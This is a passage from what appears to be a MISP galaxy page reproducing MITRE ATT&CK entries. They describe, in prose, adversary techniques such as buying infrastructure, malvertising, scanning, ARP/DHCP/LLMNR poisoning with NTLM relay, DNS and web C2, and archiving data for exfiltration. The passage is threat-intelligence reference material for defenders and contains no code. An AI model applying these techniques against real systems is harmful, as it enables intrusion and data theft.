In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a Trusted Relationship, Multi-Factor Authentication Interception, or even Supply Chain Compromise.

Note: while this technique is distinct from other behaviors such as Purchase Technical Data and Credentials, they may often be used in conjunction (especially where the acquired foothold requires Valid Accounts).

Internal MISP references

UUID 478da817-1914-50f6-b1fd-434081a34354 which can be used as unique global reference for Acquire Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Botnet - Duplicate

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[Norton Botnet] Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).[Imperva DDoS for Hire][Krebs-Anna][Krebs-Bazaar][Krebs-Booter]

Internal MISP references

UUID be637d66-5110-4872-bc15-63b062c3f290 which can be used as unique global reference for Botnet - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.005
Related clusters

To see the related clusters, click here.

DNS Server

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.[Unit42 DNS Mar 2019]

Internal MISP references

UUID bae33d7b-c835-4eda-b310-bf426270c0b1 which can be used as unique global reference for DNS Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.002
Related clusters

To see the related clusters, click here.

Domains - Duplicate

Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control.[CISA MSS Sep 2020] Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).[FireEye APT28][PaypalScam] Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise. Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.[CISA IDN ST05-016][tt_httrack_fake_domains][tt_obliqueRAT][httrack_unhcr][lazgroup_idn_phishing]

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.[Categorisation_not_boundary][Domain_Steal_CC][Redirectors_Domain_Fronting][bypass_webproxy_filtering]

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.[Mandiant APT1]

Internal MISP references

UUID b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d which can be used as unique global reference for Domains - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.001
Related clusters

To see the related clusters, click here.

Malvertising

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.[spamhaus-malvertising] Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.[Masquerads-Guardio][FBI-search] Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.[sentinelone-malvertising]

Malvertising may be used to support Drive-by Target and Drive-by Compromise, potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.[BBC-malvertising]

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.[Masquerads-Guardio] Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.[spamhaus-malvertising]

Internal MISP references

UUID 60ac24aa-ce63-5c1d-8126-db20a27d85be which can be used as unique global reference for Malvertising in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.008
Related clusters

To see the related clusters, click here.

Server - Duplicate

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in Drive-by Compromise, or email servers to support Phishing operations. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.[NYTStuxnet]

Internal MISP references

UUID 6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2 which can be used as unique global reference for Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.004
Related clusters

To see the related clusters, click here.

Serverless - Duplicate

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server.[BlackWater Malware Cloudflare Workers][AWS Lambda Redirector] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[Detecting Command & Control in the Cloud][BlackWater Malware Cloudflare Workers]

Internal MISP references

UUID c30faf84-496b-4f27-a4bc-aa36d583c69f which can be used as unique global reference for Serverless - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.007
Related clusters

To see the related clusters, click here.

Virtual Private Server - Duplicate

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.[TrendmicroHideoutsLease]

Internal MISP references

UUID 2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23 which can be used as unique global reference for Virtual Private Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.003
Related clusters

To see the related clusters, click here.

Web Services - Duplicate

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

Internal MISP references

UUID 2e883e0d-1108-431a-a2dd-98ba98b69417 which can be used as unique global reference for Web Services - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.006
Related clusters

To see the related clusters, click here.

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.[TrendmicroHideoutsLease] Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support Proxy, including from residential proxy services.[amnesty_nso_pegasus][FBI Proxies Credential Stuffing][Mandiant APT29 Microsoft 365 2022] Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

Internal MISP references

UUID 66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3 which can be used as unique global reference for Acquire Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Scanning IP Blocks

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.[Botnet Scan] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID 473afdb8-5048-4838-a3fc-56be30be1e56 which can be used as unique global reference for Scanning IP Blocks in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.001
Related clusters

To see the related clusters, click here.

Vulnerability Scanning

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.[OWASP Vuln Scanning] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).

Internal MISP references

UUID c0a8e0d6-c108-4c15-9a3a-78ef1da06e32 which can be used as unique global reference for Vulnerability Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.002
Related clusters

To see the related clusters, click here.

Wordlist Scanning

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to Brute Force, its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: Gather Victim Org Information, or Search Victim-Owned Websites).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.[ClearSky Lebanese Cedar Jan 2021] This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: Exploit Public-Facing Application or Brute Force).

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.[S3Recon GitHub][GCPBucketBrute] Once storage objects are discovered, adversaries may leverage Data from Cloud Storage to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

Internal MISP references

UUID a0e40412-cbfb-477b-87fc-40f2c84d26be which can be used as unique global reference for Wordlist Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.003
Related clusters

To see the related clusters, click here.

Active Scanning

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.[Botnet Scan][OWASP Fingerprinting] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).

Internal MISP references

UUID a930437d-5a12-4dc4-b311-f5fd6a766c85 which can be used as unique global reference for Active Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

ARP Cache Poisoning

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.[RFC826 ARP] Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.[Sans ARP Spoofing Aug 2003][Cylance Cleaver]

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.[Sans ARP Spoofing Aug 2003]

Internal MISP references

UUID 03ef726b-ac65-4e23-8130-9d299a3f458a which can be used as unique global reference for ARP Cache Poisoning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.002
Related clusters

To see the related clusters, click here.

DHCP Spoofing

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.[rfc2131] The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.[new_rogue_DHCP_serv_malware][w32.tidserv.g] Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.[rfc3315] Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, Service Exhaustion Flood) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.

Internal MISP references

UUID 52dabfcc-b7a4-4334-9014-ab9d82f5527b which can be used as unique global reference for DHCP Spoofing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.003
Related clusters

To see the related clusters, click here.

LLMNR/NBT-NS Poisoning and SMB Relay

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. [Wikipedia LLMNR][TechNet NetBIOS]

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.[byt3bl33d3r NTLM Relaying][Secure Ideas SMB Relay] Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.[GitHub NBNSpoof][Rapid7 LLMNR Spoofer][GitHub Responder]

Internal MISP references

UUID b44a263f-76b2-4a1f-baeb-dd285974eca6 which can be used as unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.001
Related clusters

To see the related clusters, click here.

Adversary-in-the-Middle

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.[Rapid7 MiTM Basics]

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.[ttint_rat][dns_changer_trojans][ad_blocker_with_miner] Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.[volexity_0day_sophos_FW] Downgrade Attacks can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.[mitm_tls_downgrade_att][taxonomy_downgrade_att_tls][tlseminar_downgrade_att]

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in Transmitted Data Manipulation. Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to Impair Defenses and/or in support of a Network Denial of Service.

Internal MISP references

UUID d98dbf30-c454-42ff-a9f3-2cd3319cc0d9 which can be used as unique global reference for Adversary-in-the-Middle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

DNS - Duplicate

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.[PAN DNS Tunneling][Medium DnsTunneling]

Internal MISP references

UUID 5c6c3492-5dbc-43ee-a3f2-ba1976d3b379 which can be used as unique global reference for DNS - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.004
Related clusters

To see the related clusters, click here.

File Transfer Protocols

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID a4f21b08-bf5b-4ba3-af69-cce01a467859 which can be used as unique global reference for File Transfer Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.002
Related clusters

To see the related clusters, click here.

Mail Protocols

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID 350fd3f9-2d62-498f-be62-fc4b9907ff02 which can be used as unique global reference for Mail Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.003
Related clusters

To see the related clusters, click here.

Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S[CrowdStrike Putter Panda] and WebSocket[Brazking-Websockets] that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID 9a21ec7b-9714-4073-9bf3-4df41995c698 which can be used as unique global reference for Web Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.001
Related clusters

To see the related clusters, click here.

Application Layer Protocol

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

Internal MISP references

UUID 8a7afe43-b814-41b3-8bd8-e1301b8ba5b4 which can be used as unique global reference for Application Layer Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Application Window Discovery

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.[Prevailion DarkWatchman 2021] For example, information about application windows could be used identify potential data to collect as well as identifying security tooling (Security Software Discovery) to evade.[ESET Grandoreiro April 2020]

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as Command and Scripting Interpreter commands and Native API functions.

Internal MISP references

UUID 3b2f435a-8666-43b5-9883-f2808eebd726 which can be used as unique global reference for Application Window Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Archive via Custom Method

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.[ESET Sednit Part 2]

Internal MISP references

UUID 41da2363-af05-46b8-990e-2cc749b5aac8 which can be used as unique global reference for Archive via Custom Method in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.003
Related clusters

To see the related clusters, click here.

Archive via Library

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile [PyPI RAR], libzip [libzip], and zlib [Zlib Github]. Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

Internal MISP references

UUID ccf06b4a-bc33-4db1-bc66-74a0a7c31451 which can be used as unique global reference for Archive via Library in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.002
Related clusters

To see the related clusters, click here.

Archive via Utility

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems.

On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. Remote Data Staging).[diantz.exe_lolbas] xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use certutil to Base64 encode collected data before exfiltration.

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.[7zip Homepage][WinRAR Homepage][WinZip Homepage]

Internal MISP references

UUID 3042a254-a2a9-4cb9-9939-087a24c64907 which can be used as unique global reference for Archive via Utility in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.001
Related clusters

To see the related clusters, click here.

Archive Collected Data

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

Internal MISP references

UUID ebd3f870-c513-4fb0-b133-15ffc1f91db2 which can be used as unique global reference for Archive Collected Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Audio Capture

An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Internal MISP references

UUID 2be5c67a-edae-4083-8b6d-f99eaa622ed4 which can be used as unique global reference for Audio Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Automated Collection

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.

Internal MISP references

UUID 107ad6c5-79b1-468c-9519-1578bee2ac49 which can be used as unique global reference for Automated Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Traffic Duplication

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. [Cisco Traffic Mirroring][Juniper Traffic Mirroring]

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through ROMMONkit or Patch System Image.[US-CERT-TA18-106A][Cisco Blog Legacy Device Attacks]

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.[AWS Traffic Mirroring][GCP Packet Mirroring][Azure Virtual Network TAP]

Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.

Internal MISP references

UUID c2fc2776-e674-46ff-8b8d-ecc90b8b1c26 which can be used as unique global reference for Traffic Duplication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1020.001
Related clusters

To see the related clusters, click here.

Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Internal MISP references

UUID 26abc19f-5968-45f1-aa1f-f35863a2f804 which can be used as unique global reference for Automated Exfiltration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

BITS Jobs

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).[Microsoft COM][Microsoft BITS] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.[Microsoft BITS][Microsoft BITSAdmin]

